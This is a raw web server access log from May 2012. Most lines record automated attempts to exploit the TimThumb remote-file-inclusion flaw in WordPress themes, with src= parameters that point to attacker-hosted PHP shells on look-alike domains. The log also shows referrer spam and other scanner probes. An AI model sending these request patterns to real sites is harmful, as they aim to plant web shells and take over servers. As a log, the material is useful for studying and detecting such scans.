176.195.245.159 - - [14/May/2012:07:04:41 +0200] "GET /stats/log.keys.html HTTP/1.0" 200 20219 "http://yandex.ru/yandsearch?text=%22/themes/karma/%22+page_id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
78.137.37.171 - - [14/May/2012:07:04:48 +0200] "GET /logs/access_log HTTP/1.0" 200 1496741 "http://androidusplay.info/sitemap7.html" "Opera/8.01 (Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:07:04:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1496904 "http://androidusplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
78.137.37.171 - - [14/May/2012:07:04:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1497140 "http://androidusplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:07:04:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1497370 "http://androidusplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.137.37.171 - - [14/May/2012:07:04:51 +0200] "GET /logs/access_log HTTP/1.0" 200 1497570 "http://androidusplay.info/sitemap7.html" "Mozilla/4.79 [en] (Windows NT 5.0; U)"
89.33.197.242 - - [14/May/2012:07:06:00 +0200] "GET /stats//wp-content/themes/AskIt/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:06:01 +0200] "GET /stats//wp-content/themes/AskIt/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:06:01 +0200] "GET /stats//wp-content/themes/AskIt/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:06:01 +0200] "GET //wp-content/themes/AskIt/tools/timthumb.php?src= HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:06:01 +0200] "GET //wp-content/themes/AskIt/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:06:02 +0200] "GET //wp-content/themes/AskIt/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.141.35.196 - - [14/May/2012:07:06:34 +0200] "GET /stats/zboard.php?id=OrnamenCrew HTTP/1.1" 404 298 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.141.35.196 - - [14/May/2012:07:06:35 +0200] "GET /zboard.php?id=OrnamenCrew HTTP/1.1" 404 292 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
87.253.155.151 - - [14/May/2012:07:07:05 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/bot.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:07:05 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:07:05 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/xx.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:07:06 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/bot.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:07:06 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:07:06 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/xx.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:07:06 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/bot.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:07:06 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:07:07 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/xx.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:07:07 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/bot.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:07:07 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:07:07 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/xx.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.118.24.103 - - [14/May/2012:07:07:11 +0200] "GET /stats/zboard.php?id=OrnamenCrew HTTP/1.1" 404 298 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
217.118.24.103 - - [14/May/2012:07:07:11 +0200] "GET /zboard.php?id=OrnamenCrew HTTP/1.1" 404 292 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
87.253.155.151 - - [14/May/2012:07:08:17 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/bot.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:08:17 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:08:17 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/xx.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:08:18 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/bot.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:08:18 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.253.155.151 - - [14/May/2012:07:08:18 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.musicui.com/xx.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:07:08:17 +0200] "GET /logs/access_log HTTP/1.0" 200 1502911 "http://androidenplay.info/sitemap210.html" "Mozilla/0.91 Beta (Windows)"
95.132.213.162 - - [14/May/2012:07:08:19 +0200] "GET /logs/access_log HTTP/1.0" 200 1504561 "http://androidenplay.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
95.132.213.162 - - [14/May/2012:07:08:20 +0200] "GET /logs/access_log HTTP/1.0" 200 1504800 "http://androidenplay.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.67.205.187 - - [14/May/2012:07:08:25 +0200] "GET /stats//wp-content/themes/striking/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:08:25 +0200] "GET //wp-content/themes/striking/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:08:27 +0200] "GET /stats//wp-content/themes/striking/includes/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:08:27 +0200] "GET //wp-content/themes/striking/includes/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:07:08:26 +0200] "GET /logs/access_log HTTP/1.0" 200 1505526 "http://androidenplay.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
95.132.213.162 - - [14/May/2012:07:08:30 +0200] "GET /logs/access_log HTTP/1.0" 200 1506296 "http://androidenplay.info/sitemap210.html" "Opera/9.00 (Windows NT 4.0; U; en)"
78.137.37.171 - - [14/May/2012:07:08:46 +0200] "GET /logs/access_log HTTP/1.0" 200 1506469 "http://androidusplay.info/sitemap14.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
78.137.37.171 - - [14/May/2012:07:08:47 +0200] "GET /logs/access_log HTTP/1.0" 200 1506710 "http://androidusplay.info/sitemap14.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:07:08:47 +0200] "GET /logs/access_log HTTP/1.0" 200 1506977 "http://androidusplay.info/sitemap14.html" "Mozilla/4.76 [en] (Windows NT 5.0; U)"
78.137.37.171 - - [14/May/2012:07:08:48 +0200] "GET /logs/access_log HTTP/1.0" 200 1507151 "http://androidusplay.info/sitemap14.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:07:08:48 +0200] "GET /logs/access_log HTTP/1.0" 200 1507357 "http://androidusplay.info/sitemap14.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
62.231.92.34 - - [14/May/2012:07:09:16 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/bot.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:09:17 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:09:17 +0200] "GET /stats//wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/xx.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:09:17 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/bot.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:09:18 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.231.92.34 - - [14/May/2012:07:09:18 +0200] "GET //wp-content/themes/OnTheGo/timthumb.php?src=http://flickr.com.mmonlinefashions.com/xx.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.149.157.176 - - [14/May/2012:07:09:56 +0200] "GET /stats//wp-content/themes/albizia/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.149.157.176 - - [14/May/2012:07:09:58 +0200] "GET //wp-content/themes/albizia/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.98.151.118 - - [14/May/2012:07:10:11 +0200] "GET /stats//wp-content/themes/premiumnews/thumb.php?src=http://wordpress.com.airatrip.com/temp/dapetsatu.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.98.151.118 - - [14/May/2012:07:10:11 +0200] "GET //wp-content/themes/premiumnews/thumb.php?src=http://wordpress.com.airatrip.com/temp/dapetsatu.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.118.24.103 - - [14/May/2012:07:11:28 +0200] "GET /stats/zboard.php?id=OrnamenCrew HTTP/1.1" 404 298 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
217.118.24.103 - - [14/May/2012:07:11:28 +0200] "GET /zboard.php?id=OrnamenCrew HTTP/1.1" 404 292 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
78.137.37.171 - - [14/May/2012:07:12:35 +0200] "GET /logs/access_log HTTP/1.0" 200 1510504 "http://androidusplay.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:07:12:36 +0200] "GET /logs/access_log HTTP/1.0" 200 1510716 "http://androidusplay.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
78.137.37.171 - - [14/May/2012:07:12:37 +0200] "GET /logs/access_log HTTP/1.0" 200 1510903 "http://androidusplay.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
78.137.37.171 - - [14/May/2012:07:12:37 +0200] "GET /logs/access_log HTTP/1.0" 200 1511165 "http://androidusplay.info/sitemap21.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
78.137.37.171 - - [14/May/2012:07:12:38 +0200] "GET /logs/access_log HTTP/1.0" 200 1511427 "http://androidusplay.info/sitemap21.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
190.12.73.138 - - [14/May/2012:07:13:40 +0200] "GET /stats//wp-content/plugins/islidex/js/timthumb.php?src=http://livinginrwanda.com/chat/bss.txt HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
190.12.73.138 - - [14/May/2012:07:13:41 +0200] "GET /stats//wp-content/plugins/islidex/js/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
190.12.73.138 - - [14/May/2012:07:13:43 +0200] "GET //wp-content/plugins/islidex/js/timthumb.php?src=http://livinginrwanda.com/chat/bss.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
190.12.73.138 - - [14/May/2012:07:13:44 +0200] "GET //wp-content/plugins/islidex/js/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
216.70.71.78 - - [14/May/2012:07:13:59 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:13:59 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:13:59 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:13:59 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:13:59 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:13:59 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.106.213.254 - - [14/May/2012:07:14:22 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://picasa.com.yenisahne.com/cybercrime.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.106.213.254 - - [14/May/2012:07:14:22 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://picasa.com.yenisahne.com/cybercrime.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.106.213.254 - - [14/May/2012:07:14:27 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://picasa.com.yenisahne.com/cybercrime.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.106.213.254 - - [14/May/2012:07:14:28 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://picasa.com.yenisahne.com/cybercrime.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:15:15 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:15:15 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:15:16 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:15:16 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:15:16 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:15:17 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
209.250.0.35 - - [14/May/2012:07:15:37 +0200] "GET /stats//wp-content/themes/Avenue/timthumb.php?src=http://blogger.com.crediyasa.com/content/tes.php HTTP/1.1" 404 326 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
209.250.0.35 - - [14/May/2012:07:15:39 +0200] "GET //wp-content/themes/Avenue/timthumb.php?src=http://blogger.com.crediyasa.com/content/tes.php HTTP/1.1" 404 320 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
89.33.197.242 - - [14/May/2012:07:16:00 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:16:00 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:16:00 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:16:01 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:16:01 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:16:01 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
209.250.0.35 - - [14/May/2012:07:16:03 +0200] "GET /stats//wp-content/themes/Avenue/timthumb.php?src=http://blogger.com.crediyasa.com/content/tes.php HTTP/1.1" 404 326 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
209.250.0.35 - - [14/May/2012:07:16:04 +0200] "GET //wp-content/themes/Avenue/timthumb.php?src=http://blogger.com.crediyasa.com/content/tes.php HTTP/1.1" 404 320 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
219.121.0.60 - - [14/May/2012:07:16:54 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:07:16:55 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:07:16:55 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:07:16:55 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
219.121.0.60 - - [14/May/2012:07:16:56 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
219.121.0.60 - - [14/May/2012:07:16:56 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
77.92.69.1 - - [14/May/2012:07:17:08 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:17:08 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.198.87.118 - - [14/May/2012:07:17:18 +0200] "GET /stats//wp-content/themes/object/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
